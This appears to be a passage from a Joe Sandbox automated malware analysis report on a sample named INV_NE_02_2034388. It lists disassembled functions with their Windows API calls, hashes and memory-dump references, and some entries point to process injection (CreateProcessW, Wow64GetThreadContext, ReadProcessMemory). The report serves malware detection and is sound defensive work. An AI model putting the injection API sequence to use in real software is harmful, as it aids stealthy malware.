                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                          • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                          • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                          • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                          Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                          • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                          • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                          • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                          Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                          • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                          • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                          • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                          Function 00BA7DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ComputerName
                                          • String ID:
                                          • API String ID: 3545744682-0
                                          • Opcode ID: 7671e1e6146474ba7e8fbaeb26d40d21179994397be753005d51d363d4bc1c61
                                          • Instruction ID: 82b23267d3b9f5b070bf7bf9c73f8903b87d02bd162ccd5d414a0347c0d34468
                                          • Opcode Fuzzy Hash: 7671e1e6146474ba7e8fbaeb26d40d21179994397be753005d51d363d4bc1c61
                                          • Instruction Fuzzy Hash: B121C4F16CD3446BD63567149C0ABB93AE5EFA3710F8844FAA9C8561E1DD642C0482A3
                                          Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00404370
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                          • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                          • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                          • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                          Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                            • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                          • __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                            • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                            • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                            • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                          • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                          • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                          • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                          Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                          • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                          • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                          • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                          • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                          • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                          Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00468D1B
                                            • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                            • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                          • _free.LIBCMT ref: 00468D2C
                                          • _free.LIBCMT ref: 00468D3E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                          Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 31f79041ba6283071c4b8af3f49d60571bdad53e6355720ab6d22f774a5a2314
                                          • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                          • Opcode Fuzzy Hash: 31f79041ba6283071c4b8af3f49d60571bdad53e6355720ab6d22f774a5a2314
                                          • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                          Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                          • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                          Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00404834
                                            • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                            • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                            • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                            • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                            • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                            • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                            • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                            • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                            • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                          • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                          • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                          • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                          Function 00B85A3B Relevance: 3.1, APIs: 2, Instructions: 59threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,00B855C0,?,00000000,00000000), ref: 00B85A51
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B85B11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Thread$CreateExitUser
                                          • String ID:
                                          • API String ID: 4108186749-0
                                          • Opcode ID: 83065cd0163877be948c8c846ed9876939e24b7c01a2fdc0071c0cef50d7ce91
                                          • Instruction ID: 53723d26443d7a25fa0b4435ed12640d1662a76ada8a3b5ace13be3e86ad4915
                                          • Opcode Fuzzy Hash: 83065cd0163877be948c8c846ed9876939e24b7c01a2fdc0071c0cef50d7ce91
                                          • Instruction Fuzzy Hash: 09116A1550CBC24ED737AB288825726AFE0DF63320F1902DAD0908E1F3C2695D08CBA3
                                          Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          • std::exception::exception.LIBCMT ref: 00420DEC
                                          • __CxxThrowException@8.LIBCMT ref: 00420E01
                                            • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                          • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                          • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                          • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                          Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • __lock_file.LIBCMT ref: 004253EB
                                            • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                          • __fclose_nolock.LIBCMT ref: 004253F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                          • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                          • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                          • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                          Function 00B85D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B85D6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: ead49a88db77857ae9b3032add3cf81cbf728ee01a85d04367318b8ef2298bc9
                                          • Instruction ID: 0693c2d1bc50536e0f90a9fa12bec2b446f95dd79d3b4bd243d4bc48b76bc7b0
                                          • Opcode Fuzzy Hash: ead49a88db77857ae9b3032add3cf81cbf728ee01a85d04367318b8ef2298bc9
                                          • Instruction Fuzzy Hash: 68F0B465A04F04AADB3E3368ED4EFB16AD0E712729F4C41F9AE405A0B39A516C02C742
                                          Function 00E9CEDD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00E9D69B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9D731
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E9D753
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                          • Instruction ID: 640f227e15d7c1dbed9e980eb5bb11c7d05243373a1470b01c8ff0a8e0c84867
                                          • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                          • Instruction Fuzzy Hash: 0012D024E18658C6EB24DF64D8507DEB232EF68300F1060E9910DEB7A5E77A4F91CF5A
                                          Function 00B85F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba15af03e3d20e36425fe2f6a1b934f659e89eb74aecce965b5b49893f2b530d
                                          • Instruction ID: 1c3bad3f02fc0bffcfa45481fd492bb09fc767efd78bd799cc6b481202ccbf74
                                          • Opcode Fuzzy Hash: ba15af03e3d20e36425fe2f6a1b934f659e89eb74aecce965b5b49893f2b530d
                                          • Instruction Fuzzy Hash: F471063180CF808EC73677288C98675BBE1EB62366F4D46DAD6958B1F3D2718D44C352
                                          Function 00B86490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 160eb17e62320b7bbf337618fe6fc93a6594a99eabeefda2bce19ae1877e2877
